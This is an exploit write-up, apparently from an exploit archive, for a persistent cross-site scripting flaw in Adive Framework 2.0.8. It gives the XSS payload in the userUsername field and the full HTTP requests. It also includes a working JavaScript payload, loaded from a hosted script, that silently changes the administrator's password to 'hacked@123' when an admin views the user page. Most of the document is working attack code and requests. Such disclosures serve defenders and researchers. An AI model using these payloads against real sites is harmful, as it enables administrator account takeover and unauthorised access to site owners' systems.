88 lines
No EOL
2.9 KiB
Text
88 lines
No EOL
2.9 KiB
Text
# Exploit Title: Adive Framework 2.0.8 - Persistent Cross-Site Scripting
|
|
# Exploit Author: Sarthak Saini
|
|
# Dork: N/A
|
|
# Date: 2020-01-18
|
|
# Vendor Link : https://www.adive.es/
|
|
# Software Link: https://github.com/ferdinandmartin/adive-php7
|
|
# Version: 2.0.8
|
|
# Category: Webapps
|
|
# Tested on: windows64bit / mozila firefox
|
|
|
|
1) Persistent Cross-site Scripting at user add page
|
|
|
|
Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting
|
|
|
|
Payload:- <script>alert(1)</script>
|
|
|
|
POST /admin/user/add HTTP/1.1
|
|
Host: 192.168.2.5
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 62
|
|
Origin: http://192.168.2.5
|
|
DNT: 1
|
|
Connection: close
|
|
Referer: http://192.168.2.5/admin/user/add
|
|
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
userName=test&userUsername=<script>alert('xss')</script>&pass=test&cpass=test&permission=3
|
|
|
|
|
|
|----------------------------------------------------------------------------------
|
|
|
|
|
|
2) account takeover - cross side request forgery
|
|
|
|
|
|
Description : attacker can craft a malicious javascript and attach it to the stored xss, when admin visits the /admin/user page the payload will trigger.
|
|
|
|
-> Save the payload as exp.js
|
|
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-
|
|
function execute()
|
|
{
|
|
var nuri ="http://192.168.2.5/admin/config";
|
|
xhttp = new XMLHttpRequest();
|
|
xhttp.open("POST", nuri, true);
|
|
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
|
|
xhttp.withCredentials = "true";
|
|
var body = "";
|
|
body += "\r\n\r\n";
|
|
body +=
|
|
"userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web";
|
|
xhttp.send(body);
|
|
return true;
|
|
}
|
|
|
|
execute();
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-
|
|
|
|
-> Start a server and host the exp.js. Send the exp.js file in the xss payload
|
|
|
|
Payload:- <script src="http://192.168.2.5/exp.js"></script>
|
|
|
|
POST /admin/user/add HTTP/1.1
|
|
Host: 192.168.2.5
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 143
|
|
Origin: http://192.168.2.5
|
|
DNT: 1
|
|
Connection: close
|
|
Referer: http://192.168.2.5/admin/user/add
|
|
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3
|
|
|
|
|
|
-> As soon as admin will visit the page the payload will be triggered and the admin password will be changed to hacked@123
|
|
|
|
|-----------------------------------------EOF----------------------------------------- |